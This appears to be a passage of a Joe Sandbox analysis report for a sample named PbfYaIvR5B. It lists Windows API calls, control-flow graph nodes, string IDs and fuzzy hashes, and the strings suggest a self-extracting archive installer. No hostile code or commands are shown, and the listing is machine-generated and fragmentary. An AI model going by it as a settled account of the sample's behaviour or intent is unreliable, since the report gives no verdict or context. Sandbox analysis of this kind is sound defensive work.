                                                                                                                      • Part of subcall function 0005B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0005B3FB
                                                                                                                    • _wcslen.LIBCMT ref: 0005CA0A
                                                                                                                    • _wcslen.LIBCMT ref: 0005CA13
                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 0005CA71
                                                                                                                    • _wcslen.LIBCMT ref: 0005CAB3
                                                                                                                    • _wcsrchr.LIBVCRUNTIME ref: 0005CBFB
                                                                                                                    • GetDlgItem.USER32(?,00000066), ref: 0005CC36
                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 0005CC46
                                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,0008A472), ref: 0005CC54
                                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0005CC7F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                                                                                    • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                                                    • API String ID: 2804936435-312220925
                                                                                                                    • Opcode ID: 660887ba8ab7f8ddc7c14481cff8ac9617159fd5788d14f13833efbae82b0ae3
                                                                                                                    • Instruction ID: bce36ad492a28ba843bb212ddbc4b386a04783950637dd2929f0887841bc89fc
                                                                                                                    • Opcode Fuzzy Hash: 660887ba8ab7f8ddc7c14481cff8ac9617159fd5788d14f13833efbae82b0ae3
                                                                                                                    • Instruction Fuzzy Hash: C6E168B2900219AAEF24DB60DD45DEF73BCAB05351F5440A6FA49E7041EB749F88CF61
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 0004DA70
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0004DAAC
                                                                                                                      • Part of subcall function 0004C29A: _wcslen.LIBCMT ref: 0004C2A2
                                                                                                                      • Part of subcall function 000505DA: _wcslen.LIBCMT ref: 000505E0
                                                                                                                      • Part of subcall function 00051B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0004BAE9,00000000,?,?,?,00010458), ref: 00051BA0
                                                                                                                    • _wcslen.LIBCMT ref: 0004DDE9
                                                                                                                    • __fprintf_l.LIBCMT ref: 0004DF1C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                                                                                    • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                                                                                    • API String ID: 566448164-801612888
                                                                                                                    • Opcode ID: c565576d15d2061813cca575cc27c83cb163fba92e5dbbb5d4c9a2c809dd716a
                                                                                                                    • Instruction ID: 1a875b147eae12d898b5bb830101f438d1747a22f10ace2b4f7fbcff08c3a898
                                                                                                                    • Opcode Fuzzy Hash: c565576d15d2061813cca575cc27c83cb163fba92e5dbbb5d4c9a2c809dd716a
                                                                                                                    • Instruction Fuzzy Hash: B432D2B1900258EBDF64EF64C845AEE77A5FF04300F40457AFA059B292E7B1ED85CB98

                                                                                                                    Control-flow Graph (entry block 5d4d4-5d500; nodes marked Executed / Not Executed)
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0005B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0005B579
                                                                                                                      • Part of subcall function 0005B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0005B58A
                                                                                                                      • Part of subcall function 0005B568: IsDialogMessageW.USER32(00010458,?), ref: 0005B59E
                                                                                                                      • Part of subcall function 0005B568: TranslateMessage.USER32(?), ref: 0005B5AC
                                                                                                                      • Part of subcall function 0005B568: DispatchMessageW.USER32(?), ref: 0005B5B6
                                                                                                                    • GetDlgItem.USER32(00000068,0009FCB8), ref: 0005D4E8
                                                                                                                    • ShowWindow.USER32(00000000,00000005,?,?,?,0005AF07,00000001,?,?,0005B7B9,0007506C,0009FCB8,0009FCB8,00001000,00000000,00000000), ref: 0005D510
                                                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0005D51B
                                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,000735F4), ref: 0005D529
                                                                                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0005D53F
                                                                                                                    • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0005D559
                                                                                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0005D59D
                                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0005D5AB
                                                                                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0005D5BA
                                                                                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0005D5E1
                                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,000743F4), ref: 0005D5F0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                                                    • String ID: \
                                                                                                                    • API String ID: 3569833718-2967466578
                                                                                                                    • Opcode ID: 13fc1220a3288cc711587d8d09f429ca64213cdd755fff16d5b2e6d28f721d34
                                                                                                                    • Instruction ID: c398bd47bfd88581c3c972f909b5f755991675d715678b147924b6e191f5bbd4
                                                                                                                    • Opcode Fuzzy Hash: 13fc1220a3288cc711587d8d09f429ca64213cdd755fff16d5b2e6d28f721d34
                                                                                                                    • Instruction Fuzzy Hash: 0231F171145B42AFF321DF20DC1AFAB7FACEB83305F000509FA9196191EB688A088776

                                                                                                                    Control-flow Graph (entry block 5d78f-5d7a7; nodes marked Executed / Not Executed)
                                                                                                                    APIs
                                                                                                                    • _wcslen.LIBCMT ref: 0005D7AE
                                                                                                                    • ShellExecuteExW.SHELL32(?), ref: 0005D8DE
                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 0005D91D
                                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 0005D959
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0005D97F
                                                                                                                    • ShowWindow.USER32(?,00000001), ref: 0005D9E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                                                                    • String ID: .exe$.inf
                                                                                                                    • API String ID: 36480843-3750412487
                                                                                                                    • Opcode ID: d23aa58dc6b1d032c09db228e2c72df69005ced21884d26661fc5e85bd417f55
                                                                                                                    • Instruction ID: c5ae991f8c1e7f066cbbeb37eebd290ad096a70a448e89402d570ac8bac5990d
                                                                                                                    • Opcode Fuzzy Hash: d23aa58dc6b1d032c09db228e2c72df69005ced21884d26661fc5e85bd417f55
                                                                                                                    • Instruction Fuzzy Hash: A851E470404384AAEB709B24D845BBB7BE5AF82746F04081FFDC5971A1EB74C98CDB52

                                                                                                                    Control-flow Graph (entry block 6a95b-6a974; nodes marked Executed / Not Executed)
                                                                                                                    APIs
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00065695,00065695,?,?,?,0006ABAC,00000001,00000001,2DE85006), ref: 0006A9B5
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0006ABAC,00000001,00000001,2DE85006,?,?,?), ref: 0006AA3B
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0006AB35
                                                                                                                    • __freea.LIBCMT ref: 0006AB42
                                                                                                                      • Part of subcall function 00068E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0006CA2C,00000000,?,00066CBE,?,00000008,?,000691E0,?,?,?), ref: 00068E38
                                                                                                                    • __freea.LIBCMT ref: 0006AB4B
                                                                                                                    • __freea.LIBCMT ref: 0006AB70
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1414292761-0

                                                                                                                    Control-flow Graph

                                                                                                                    control_flow_graph 975 63b72-63b7c 976 63bee-63bf1 975->976 977 63bf3 976->977 978 63b7e-63b8c 976->978 979 63bf5-63bf9 977->979 980 63b95-63bb1 LoadLibraryExW 978->980 981 63b8e-63b91 978->981 984 63bb3-63bbc GetLastError 980->984 985 63bfa-63c00 980->985 982 63b93 981->982 983 63c09-63c0b 981->983 989 63beb 982->989 983->979 986 63be6-63be9 984->986 987 63bbe-63bd3 call 66088 984->987 985->983 988 63c02-63c03 FreeLibrary 985->988 986->989 987->986 992 63bd5-63be4 LoadLibraryExW 987->992 988->983 989->976 992->985 992->986
                                                                                                                    APIs
                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00063C35,?,?,000A2088,00000000,?,00063D60,00000004,InitializeCriticalSectionEx,00076394,InitializeCriticalSectionEx,00000000), ref: 00063C03
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeLibrary
                                                                                                                    • String ID: api-ms-
                                                                                                                    • API String ID: 3664257935-2084034818

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0005081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00050836
                                                                                                                      • Part of subcall function 0005081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0004F2D8,Crypt32.dll,00000000,0004F35C,?,?,0004F33E,?,?,?), ref: 00050858
                                                                                                                    • OleInitialize.OLE32(00000000), ref: 0005AC2F
                                                                                                                    • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0005AC66
                                                                                                                    • SHGetMalloc.SHELL32(00088438), ref: 0005AC70
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                                                    • String ID: riched20.dll$3So
                                                                                                                    • API String ID: 3498096277-3464455743

                                                                                                                    Control-flow Graph

                                                                                                                    control_flow_graph 997 498e0-49901 call 5ec50 1000 49903-49906 997->1000 1001 4990c 997->1001 1000->1001 1002 49908-4990a 1000->1002 1003 4990e-4991f 1001->1003 1002->1003 1004 49927-49931 1003->1004 1005 49921 1003->1005 1006 49936-49943 call 46edb 1004->1006 1007 49933 1004->1007 1005->1004 1010 49945 1006->1010 1011 4994b-4996a CreateFileW 1006->1011 1007->1006 1010->1011 1012 4996c-4998e GetLastError call 4bb03 1011->1012 1013 499bb-499bf 1011->1013 1017 499c8-499cd 1012->1017 1019 49990-499b3 CreateFileW GetLastError 1012->1019 1015 499c3-499c6 1013->1015 1015->1017 1018 499d9-499de 1015->1018 1017->1018 1020 499cf 1017->1020 1021 499e0-499e3 1018->1021 1022 499ff-49a10 1018->1022 1019->1015 1023 499b5-499b9 1019->1023 1020->1018 1021->1022 1024 499e5-499f9 SetFileTime 1021->1024 1025 49a12-49a2a call 50602 1022->1025 1026 49a2e-49a39 1022->1026 1023->1015 1024->1022 1025->1026
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00047760,?,00000005,?,00000011), ref: 0004995F
                                                                                                                    • GetLastError.KERNEL32(?,?,00047760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0004996C
                                                                                                                    • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00047760,?,00000005,?), ref: 000499A2
                                                                                                                    • GetLastError.KERNEL32(?,?,00047760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 000499AA
                                                                                                                    • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00047760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 000499F9
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CreateErrorLast$Time
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1999340476-0

                                                                                                                    Control-flow Graph

                                                                                                                    control_flow_graph 1056 5b568-5b581 PeekMessageW 1057 5b583-5b597 GetMessageW 1056->1057 1058 5b5bc-5b5be 1056->1058 1059 5b599-5b5a6 IsDialogMessageW 1057->1059 1060 5b5a8-5b5b6 TranslateMessage DispatchMessageW 1057->1060 1059->1058 1059->1060 1060->1058
                                                                                                                    APIs
                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0005B579
                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0005B58A
                                                                                                                    • IsDialogMessageW.USER32(00010458,?), ref: 0005B59E
                                                                                                                    • TranslateMessage.USER32(?), ref: 0005B5AC
                                                                                                                    • DispatchMessageW.USER32(?), ref: 0005B5B6
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$DialogDispatchPeekTranslate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1266772231-0

                                                                                                                    Control-flow Graph

                                                                                                                    control_flow_graph 1061 5abab-5abca GetClassNameW 1062 5abf2-5abf4 1061->1062 1063 5abcc-5abe1 call 51fbb 1061->1063 1064 5abf6-5abf9 SHAutoComplete 1062->1064 1065 5abff-5ac01 1062->1065 1068 5abf1 1063->1068 1069 5abe3-5abef FindWindowExW 1063->1069 1064->1065 1068->1062 1069->1068
                                                                                                                    APIs
                                                                                                                    • GetClassNameW.USER32(?,?,00000050), ref: 0005ABC2
                                                                                                                    • SHAutoComplete.SHLWAPI(?,00000010), ref: 0005ABF9
                                                                                                                      • Part of subcall function 00051FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0004C116,00000000,.exe,?,?,00000800,?,?,?,00058E3C), ref: 00051FD1
                                                                                                                    • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0005ABE9
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                                    • String ID: EDIT
                                                                                                                    • API String ID: 4243998846-3080729518
                                                                                                                    • Opcode ID: 3f2b4746585b0a939dd69249c4d9e6ac1887b3dc6d5b9436a1600b24d2e1a9b2
                                                                                                                    • Instruction ID: 7e9de1ea645f03fc06b32e9832bdefa822aba41545af376c8f557d5d1989b3c6
                                                                                                                    • Opcode Fuzzy Hash: 3f2b4746585b0a939dd69249c4d9e6ac1887b3dc6d5b9436a1600b24d2e1a9b2
                                                                                                                    • Instruction Fuzzy Hash: E0F082327006287AEB2056249C09FDB76AC9B47B41F494121BE05A2181D768DA45C6F6

                                                                                                                    Control-flow Graph

                                                                                                                    control_flow_graph 1070 5dbde-5dc09 call 5ec50 SetEnvironmentVariableW call 50371 1074 5dc0e-5dc12 1070->1074 1075 5dc14-5dc18 1074->1075 1076 5dc36-5dc38 1074->1076 1077 5dc21-5dc28 call 5048d 1075->1077 1080 5dc1a-5dc20 1077->1080 1081 5dc2a-5dc30 SetEnvironmentVariableW 1077->1081 1080->1077 1081->1076
                                                                                                                    APIs
                                                                                                                    • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0005DBF4
                                                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0005DC30
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: EnvironmentVariable
                                                                                                                    • String ID: sfxcmd$sfxpar
                                                                                                                    • API String ID: 1431749950-3493335439
                                                                                                                    • Opcode ID: e7a9aaf7c6ed70b561a1244f8defb1f3cf42c46b7dbf7dc438abc12ef94f74c6
                                                                                                                    • Instruction ID: 033642d1b7718faf2fdda00d3656e0ade81ba6fd074d6b497500603965c4e156
                                                                                                                    • Opcode Fuzzy Hash: e7a9aaf7c6ed70b561a1244f8defb1f3cf42c46b7dbf7dc438abc12ef94f74c6
                                                                                                                    • Instruction Fuzzy Hash: 2DF0A7B2805225A6DB301F94CC06BEF3B98AF04783B444412BD89A9152E6F88984D6A1

                                                                                                                    Control-flow Graph

                                                                                                                    control_flow_graph 1082 49785-49791 1083 49793-4979b GetStdHandle 1082->1083 1084 4979e-497b5 ReadFile 1082->1084 1083->1084 1085 497b7-497c0 call 498bc 1084->1085 1086 49811 1084->1086 1090 497c2-497ca 1085->1090 1091 497d9-497dd 1085->1091 1088 49814-49817 1086->1088 1090->1091 1094 497cc 1090->1094 1092 497ee-497f2 1091->1092 1093 497df-497e8 GetLastError 1091->1093 1096 497f4-497fc 1092->1096 1097 4980c-4980f 1092->1097 1093->1092 1095 497ea-497ec 1093->1095 1098 497cd-497d7 call 49785 1094->1098 1095->1088 1096->1097 1099 497fe-49807 GetLastError 1096->1099 1097->1088 1098->1088 1099->1097 1102 49809-4980a 1099->1102 1102->1098
                                                                                                                    APIs
                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00049795
                                                                                                                    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 000497AD
                                                                                                                    • GetLastError.KERNEL32 ref: 000497DF
                                                                                                                    • GetLastError.KERNEL32 ref: 000497FE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$FileHandleRead
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2244327787-0
                                                                                                                    • Opcode ID: 790c12d788e9bb9f89cab2e4f4b543dae49445680f616b73bbb780ddfa82b785
                                                                                                                    • Instruction ID: 9e25d9aec1a0cd78f118c5b8854f87f2a7436a9bab7a73ba89ee9715d7fb3fb0
                                                                                                                    • Opcode Fuzzy Hash: 790c12d788e9bb9f89cab2e4f4b543dae49445680f616b73bbb780ddfa82b785
                                                                                                                    • Instruction Fuzzy Hash: B71182B0914204EBEF705F68C804A6F37E9FB52320F108639F41A95190DB789E84EB69
                                                                                                                    APIs
                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00063F73,00000000,00000000,?,0006ACDB,00063F73,00000000,00000000,00000000,?,0006AED8,00000006,FlsSetValue), ref: 0006AD66
                                                                                                                    • GetLastError.KERNEL32(?,0006ACDB,00063F73,00000000,00000000,00000000,?,0006AED8,00000006,FlsSetValue,00077970,FlsSetValue,00000000,00000364,?,000698B7), ref: 0006AD72
                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0006ACDB,00063F73,00000000,00000000,00000000,?,0006AED8,00000006,FlsSetValue,00077970,FlsSetValue,00000000), ref: 0006AD80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3177248105-0
                                                                                                                    • Opcode ID: 30384a8c9751cfa67822b72584ccfe8037f974872e1563cc85fa4d62f4d2b521
                                                                                                                    • Instruction ID: 805634e3e5dcad6ef03e87f1ae9266b728b4b8d4786016b27912c0570bcedddc
                                                                                                                    • Opcode Fuzzy Hash: 30384a8c9751cfa67822b72584ccfe8037f974872e1563cc85fa4d62f4d2b521
                                                                                                                    • Instruction Fuzzy Hash: D201F736B01222AFE7719A68DC44A5B7B99EF067A27110620F90BF7550DB28D9418EE1
                                                                                                                    APIs
                                                                                                                    • GetStdHandle.KERNEL32(000000F5,?,?,?,?,0004D343,00000001,?,?,?,00000000,0005551D,?,?,?), ref: 00049F9E
                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,0005551D,?,?,?,?,?,00054FC7,?), ref: 00049FE5
                                                                                                                    • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0004D343,00000001,?,?), ref: 0004A011
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: FileWrite$Handle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4209713984-0
                                                                                                                    • Opcode ID: 81900ae857a0e9c53446641a6b35dd3389beefe1d32acad33bd1e31ae4b7eb1b
                                                                                                                    • Instruction ID: a3bf06e34101c43c8046de908868f8a59295a881b213088797934b774766cad3
                                                                                                                    • Opcode Fuzzy Hash: 81900ae857a0e9c53446641a6b35dd3389beefe1d32acad33bd1e31ae4b7eb1b
                                                                                                                    • Instruction Fuzzy Hash: 1331C2B1244305AFEB14CF20D818BAF77A5FF85710F000539F585AB290C779AD88CBA6
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0004C27E: _wcslen.LIBCMT ref: 0004C284
                                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0004A175,?,00000001,00000000,?,?), ref: 0004A2D9
                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0004A175,?,00000001,00000000,?,?), ref: 0004A30C
                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,0004A175,?,00000001,00000000,?,?), ref: 0004A329
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2260680371-0
                                                                                                                    • Opcode ID: 19965eea739f3f305751384cee8e7ad42ab96d8e42d1e856ec09ae9557a382b4
                                                                                                                    • Instruction ID: 68fa95ee1dea175f2bd26902dc9213c9bf698795f06eec4639b7c9abc3a781a8
                                                                                                                    • Opcode Fuzzy Hash: 19965eea739f3f305751384cee8e7ad42ab96d8e42d1e856ec09ae9557a382b4
                                                                                                                    • Instruction Fuzzy Hash: 7301F9B174121459FF61AF745C05BEE32889F0B382F040474F841E1081E798CB8196BA
                                                                                                                    APIs
                                                                                                                    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0006B8B8
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: Info
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1807457897-3916222277
                                                                                                                    • Opcode ID: 6871a00a4c2d2944872408eb0e4956464be637c3b2f79a5a16701cdb7f19eeb5
                                                                                                                    • Instruction ID: a4fdf792d8030f0aa043aa11befafe404e71097913295f1a13b4c4beafa4fdc8
                                                                                                                    • Opcode Fuzzy Hash: 6871a00a4c2d2944872408eb0e4956464be637c3b2f79a5a16701cdb7f19eeb5
                                                                                                                    • Instruction Fuzzy Hash: 2B41F8B050428C9EDB218E688C84BFABBEEDB55304F1404EDE69AC7142D3359A85DF71
                                                                                                                    APIs
                                                                                                                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 0006AFDD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: String
                                                                                                                    • String ID: LCMapStringEx
                                                                                                                    • API String ID: 2568140703-3893581201
                                                                                                                    • Opcode ID: 1b9010922f8d1d00e7f00b40c91e8966b22519b5cc37d91034fa72305039ce96
                                                                                                                    • Instruction ID: 645066bc3dd48858afebd4a79dc15cc9bb8ccbd3a0efb4430033d2a2f158c22a
                                                                                                                    • Opcode Fuzzy Hash: 1b9010922f8d1d00e7f00b40c91e8966b22519b5cc37d91034fa72305039ce96
                                                                                                                    • Instruction Fuzzy Hash: 6101E932A05209BBDF126FA0DC05DEE7F62EF09750F018154FE1865161CA3A8971EF95
                                                                                                                    APIs
                                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0006A56F), ref: 0006AF55
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CountCriticalInitializeSectionSpin
                                                                                                                    • String ID: InitializeCriticalSectionEx
                                                                                                                    • API String ID: 2593887523-3084827643
                                                                                                                    • Opcode ID: 7cc5a8deb70103773b7c6b69ce0fe47578ba615771fe7a2f8b335f1b8c60e3cc
                                                                                                                    • Instruction ID: 414eae3f321e15d8a352d4002604a434c57defa6c91ff9c78e28fe02d2cf9fae
                                                                                                                    • Opcode Fuzzy Hash: 7cc5a8deb70103773b7c6b69ce0fe47578ba615771fe7a2f8b335f1b8c60e3cc
                                                                                                                    • Instruction Fuzzy Hash: C7F0B431A46218BBDB116F54CC02CAEBFA1EF09751B418074FE0C6A261DA394A10EB8A
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Alloc
                                                                                                                    • String ID: FlsAlloc
                                                                                                                    • API String ID: 2773662609-671089009
                                                                                                                    • Opcode ID: d07f3d8d149a297f0a89f0dc346e909d9912735d985fd2ca1a316d1f48c1f73f
                                                                                                                    • Instruction ID: 54a69414b08b1e2ee336cc509cf69408df861cbb680f6d0a14aa6a84515d6633
                                                                                                                    • Opcode Fuzzy Hash: d07f3d8d149a297f0a89f0dc346e909d9912735d985fd2ca1a316d1f48c1f73f
                                                                                                                    • Instruction Fuzzy Hash: DBE05530F46208BBE200BB24CC02D6FBB91DB05721B0040A8FE0EBB240CE3C4E418ACA
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005EAF9
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: 3So
                                                                                                                    • API String ID: 1269201914-1105799393
                                                                                                                    • Opcode ID: 922a99036b7f594292d9150e4004b4815f8f21c954fed95267ff7c37ec009c84
                                                                                                                    • Instruction ID: df333861c2e4f841e8cc4207ca739a3efc9ee6afe79b087f51fb14b21854b41d
                                                                                                                    • Opcode Fuzzy Hash: 922a99036b7f594292d9150e4004b4815f8f21c954fed95267ff7c37ec009c84
                                                                                                                    • Instruction Fuzzy Hash: 14B012DA29A1C27C311C6250DD43C3B020CC3C1B92330D02FFD98CC082DC842E090832
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0006B7BB: GetOEMCP.KERNEL32(00000000,?,?,0006BA44,?), ref: 0006B7E6
                                                                                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0006BA89,?,00000000), ref: 0006BC64
